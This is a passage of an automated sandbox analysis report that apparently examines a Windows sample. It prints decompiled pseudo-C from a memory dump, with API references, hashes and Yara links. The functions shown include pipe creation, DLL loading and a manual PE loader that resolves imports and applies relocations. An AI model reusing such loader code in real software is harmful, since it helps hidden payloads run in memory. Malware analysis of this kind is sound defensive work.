					_t102 =  *0x9e684; // 0x12af8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}

0x0008a9c2
0x0008a9c4
0x0008a9d0
0x0008a9d5
0x0008a9d8
0x0008a9da
0x0008a9dd
0x0008a9e0
0x0008a9e7
0x0008a9ea
0x0008a9f1
0x0008a9f4
0x0008a9fe
0x0008a9ff
0x0008aa02
0x0008aa04
0x0008aa05
0x0008aa1c
0x0008ab9c
0x00000000
0x0008ab9c
0x0008aa33
0x0008ab68
0x0008ab6e
0x0008ab79
0x0008ab7b
0x0008ab83
0x0008ab83
0x0008ab8a
0x0008ab8c
0x0008ab95
0x0008ab95
0x00000000
0x0008ab98
0x0008aa39
0x0008aa3c
0x0008aa3f
0x0008aa45
0x0008aa4f
0x0008aa59
0x0008aa60
0x0008aa69
0x0008aa6b
0x0008aa71
0x00000000
0x00000000
0x0008aa7c
0x0008aa83
0x0008aa84
0x0008aa89
0x0008aa8a
0x0008aa8b
0x0008aa90
0x0008aa92
0x0008aa93
0x0008aa94
0x0008aa97
0x0008aa9d
0x00000000
0x00000000
0x0008aaa3
0x0008aaab
0x0008aaae
0x0008aab6
0x0008aab9
0x0008aabc
0x0008aac2
0x0008aad6
0x0008aadc
0x0008aae2
0x0008ab0b
0x0008aae4
0x0008aae4
0x0008aae6
0x0008aae8
0x0008aaf0
0x0008aaf8
0x0008aafd
0x0008aafd
0x0008ab11
0x0008ab13
0x0008ab13
0x0008ab1b
0x0008ab23
0x0008ab24
0x0008ab29
0x0008ab32
0x0008ab52
0x0008ab52
0x0008ab5a
0x0008ab5d
0x0008ab65
0x00000000
0x0008ab65
0x0008ab3b
0x0008ab3f
0x00000000
0x00000000
0x0008ab47
0x00000000

APIs

memset.MSVCRT ref: 0008A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

D, xrefs: 0008AA4F

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
Opcode Fuzzy Hash: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xf0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xf0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xf0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xf0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xf0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0x12af8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0x12afa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x0008c4ce
0x0008c4ce
0x0008c4ce
0x0008c4d1
0x0008c4dd
0x0008c4e8
0x0008c504
0x0008c509
0x0008c512
0x0008c514
0x0008c51c
0x0008c53d
0x0008c542
0x0008c54f
0x0008c55a
0x0008c561
0x0008c568
0x0008c579
0x0008c57f
0x0008c582
0x0008c599
0x0008c5a5
0x0008c5ad
0x0008c5b4
0x0008c5ba
0x0008c5c6
0x0008c5cc
0x0008c5d3
0x0008c5e6
0x0008c5d5
0x0008c5d5
0x0008c5d8
0x0008c5de
0x0008c5e3
0x0008c5e8
0x0008c5f3
0x0008c605
0x0008c617
0x00000000
0x0008c619
0x0008c620
0x00000000
0x0008c626
0x0008c627
0x0008c627
0x0008c62e
0x0008c630
0x0008c635
0x0008c635
0x0008c63a
0x0008c63e
0x0008c63e

APIs

LoadLibraryW.KERNEL32 ref: 0008C5C6
memset.MSVCRT ref: 0008C605

Strings

%08x, xrefs: 0008C52F
dll, xrefs: 0008C588

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
Opcode Fuzzy Hash: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725

Uniqueness

Uniqueness Score: -1.00%

Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x00092d76
0x00092d7b
0x00092d7f
0x00092d82
0x00092d82
0x00092d85
0x00092d8a
0x00092d8f
0x00092d92
0x00092d97
0x00092d9a
0x00092da0
0x00092da0
0x00092dab
0x00092dae
0x00092db5
0x00092dba
0x00000000
0x00000000
0x00092dc0
0x00092dc5
0x00092dc5
0x00092dca
0x00092dd0
0x00092dda
0x00092ddf
0x00092de5
0x00092e04
0x00092e07
0x00092e12
0x00092e12
0x00092e12
0x00092e09
0x00092e09
0x00092e0b
0x00000000
0x00092e0d
0x00092e0d
0x00092e0d
0x00092e0b
0x00092e1a
0x00092e1f
0x00092e24
0x00092e2a
0x00092e2e
0x00092e31
0x00092e34
0x00092e3a
0x00092e3f
0x00092e42
0x00092e48
0x00092e4d
0x00092e53
0x00092e59
0x00092e5e
0x00092e61
0x00092e66
0x00092e6a
0x00092e6e
0x00092e71
0x00092e74
0x00092e7d
0x00092e84
0x00092e87
0x00092e8a
0x00092e8f
0x00092e94
0x00092e97
0x00092e9a
0x00092e9a
0x00092e9e
0x00092ea7
0x00092eae
0x00092eb1
0x00092eb6
0x00092ebb
0x00092ebb
0x00092ebe
0x00092ec3
0x00000000
0x00000000
0x00092de7
0x00092de9
0x00092df6
0x00000000
0x00000000
0x00092df6
0x00092de9
0x00000000
0x00092de5
0x00092ec9
0x00092ece
0x00092ed1
0x00092ed4
0x00092f7f
0x00092f7f
0x00092eda
0x00092eda
0x00092eda
0x00092edf
0x00092f09
0x00092f0c
0x00092f0c
0x00092f11
0x00092f13
0x00092f15
0x00092f18
0x00092f1b
0x00092f23
0x00092f28
0x00092f28
0x00092f2e
0x00092f31
0x00092f34
0x00092f37
0x00092f39
0x00092f39
0x00092f3a
0x00092f3a
0x00092f37
0x00092f48
0x00092f4b
0x00092f4f
0x00092f54
0x00092f57
0x00092f5a
0x00092f5a
0x00092f5a
0x00092f5d
0x00092f5d
0x00092f60
0x00092f60
0x00092ee1
0x00092ee1
0x00092ef1
0x00092ef4
0x00092ef9
0x00092ef9
0x00092efc
0x00092eff
0x00092f02
0x00092f04
0x00092f04
0x00092f63
0x00092f65
0x00092f68
0x00092f68
0x00092f6e
0x00092f72
0x00092f75
0x00092f77
0x00092f77
0x00092f88
0x00092f8a
0x00092f8a
0x00092f92
0x00092fa0
0x00092fa3
0x00092fa5
0x00092fc5
0x00092fc5
0x00092fc8
0x00092fce
0x00092fcf
0x00092fd2
0x00092fd4
0x00092fd7
0x00092fda
0x00092fdd
0x00092fe1
0x00092fe4
0x00092fe7
0x00092fea
0x00092fec
0x00092fec
0x00092fef
0x00092ff1
0x00092ff1
0x00092ff4
0x00092ff6
0x00092ff9
0x00093001
0x00093004
0x00093009
0x00093009
0x0009300f
0x00093012
0x00093015
0x00093017
0x00093017
0x00093018
0x00093018
0x00093023
0x00093023
0x00093023
0x00093026
0x00093029
0x00093029
0x0009302c
0x0009302c
0x00092fef
0x0009302f
0x00093032
0x00093035
0x00093037
0x0009303a
0x0009303c
0x0009303f
0x00093042
0x00093044
0x00093047
0x0009304f
0x00093057
0x0009305a
0x0009305a
0x0009305a
0x0009305d
0x0009305d
0x0009305d
0x00093060
0x00093066
0x00093068
0x00093068
0x0009306e
0x00093074
0x0009307d
0x00093084
0x00093086
0x00093089
0x00093089
0x0009308c
0x0009308c
0x0009308f
0x00093091
0x00093094
0x00093096
0x000930b1
0x000930b1
0x000930b5
0x000930b8
0x000930bb
0x000930be
0x000930d4
0x000930d4
0x000930d4
0x000930c0
0x000930c0
0x000930c2
0x000930c6
0x000930c9
0x00000000
0x000930cb
0x000930cb
0x000930cd
0x00000000
0x000930cf
0x000930cf
0x000930cf
0x000930cd
0x000930c9
0x000930d8
0x000930db
0x000930e0
0x000930ea
0x000930ea
0x000930ea
0x000930ed
0x00093098
0x00093098
0x0009309a
0x000930a1
0x000930a1
0x000930a3
0x000930a5
0x000930a7
0x000930ab
0x000930ad
0x000930af
0x00000000
0x00000000
0x000930af
0x000930ab
0x0009309c
0x0009309c
0x0009309f
0x00000000
0x00000000
0x0009309f
0x0009309a
0x000930f7
0x000930f9
0x000930f9
0x00093104
0x00092fa7
0x00092fa7
0x00092faa
0x00000000
0x00092fac
0x00092fac
0x00092fae
0x00092fb2
0x00000000
0x00092fb4
0x00092fb4
0x00092fb4
0x00092fb7
0x00000000
0x00092fbb
0x00092fc4
0x00092fc4
0x00092fb7
0x00092fb2
0x00092faa
0x00092f96
0x00092f9f
0x00092f9f

APIs

memcpy.MSVCRT ref: 00092E7D
memcpy.MSVCRT ref: 00092EF4
memcpy.MSVCRT ref: 00092F23
memcpy.MSVCRT ref: 00092F4F
memcpy.MSVCRT ref: 00093004

Part of subcall function 00095D90: memcpy.MSVCRT ref: 00095E6E

Part of subcall function 00094AF0: memcpy.MSVCRT ref: 00094B1A

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54

Uniqueness

Uniqueness Score: -1.00%

Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x00092afb
0x00092b01
0x00092b0a
0x00092b0d
0x00092b10
0x00000000
0x00092c01
0x00092c05
0x00092c07
0x00092c15
0x00092d33
0x00092d3c
0x00092d3f
0x00092d43
0x00092d49
0x00092d51
0x00092d51
0x00092d59
0x00000000
0x00092d64
0x00092c1b
0x00092c24
0x00092c32
0x00092c35
0x00092c52
0x00092c59
0x00092c6b
0x00092c6b
0x00092c72
0x00092c82
0x00092c9a
0x00092c84
0x00092c8c
0x00092c8c
0x00092c9d
0x00092ca1
0x00092cb1
0x00092cd4
0x00092ce6
0x00092cb3
0x00092cc7
0x00092cc7
0x00092cf0
0x00092d0c
0x00092cf2
0x00092d01
0x00092d01
0x00092d14
0x00092d1d
0x00092d1d
0x00092d2b
0x00000000
0x00092c74
0x00092c76
0x00000000
0x00092c76
0x00092c72
0x00000000
0x00092c35
0x00092b18
0x00092b26
0x00092b2b
0x00092b36
0x00092b39
0x00092b3d
0x00092b3f
0x00092b4f
0x00092b58
0x00092b61
0x00092b69
0x00092b72
0x00092b7d
0x00092b83
0x00092b86
0x00092b89
0x00092b90
0x00092b97
0x00000000
0x00000000
0x00092ba2
0x00092bb0
0x00092bbb
0x00092bc5
0x00092bdd
0x00092bea
0x00092bea
0x00092bc7
0x00092bd2
0x00092bd2
0x00092bf1
0x00092bf1
0x00092bf9
0x00092bf9
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00092C4C
LoadLibraryA.KERNEL32(?), ref: 00092C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0

Memory Dump Source

